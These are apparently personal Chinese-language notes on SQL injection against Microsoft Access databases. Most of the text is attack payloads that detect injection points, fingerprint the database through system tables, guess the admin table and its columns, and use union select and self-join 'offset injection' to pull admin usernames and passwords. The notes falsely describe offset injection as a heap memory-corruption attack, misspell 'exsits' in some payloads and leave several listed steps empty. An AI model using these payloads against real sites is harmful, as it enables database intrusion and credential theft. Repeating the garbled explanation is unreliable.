access注入

#安全 #SQL #笔记 #Hacker

简介

Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是Microsoft Office 的系统程序之一。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。

联合注入

access注入之联合注入

盲注

access注入之盲注

偏移注入

access偏移注入

判断注入点

'
and 1=1
and 1=2
or 1=1
or 1=2

数据库类型判断

# access
and exsits(select * from msysobjects) >0
# sql server
and exsits(select * from sysobjects) >0

枚举数据库

and exists(select * from admin)

枚举字段

and exists(select admin from admin)
and exists(select password from admin)

字段数判断

order by 20
order by 30
order by 25

?id=1513 and exists(select * from admin order by 6)

枚举可显示的字段

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

查询字段内容

and 1=2 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

偏移注入(已知表名,字段名猜不到)

Access偏移注入(Access Offset Injection)是一种针对内存破坏攻击的技术,通常用于攻击程序中的堆内存结构,这种攻击的原理是利用程序中处理动态分配内存(如堆内存)时的错误,通过修改内存中的偏移量来访问或修改不应该被直接访问的内存区域。

Access偏移注入攻击通常需要以下几个步骤:

1级偏移注入的payload

2级偏移注入的payload

-- 定位
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,* from admin

-- 偏移计算
-- 22-16=6

-- 内存修改,使用别名方式嵌套输出内容
-- 10+6*2=22
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

-- 4+6*3=22
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)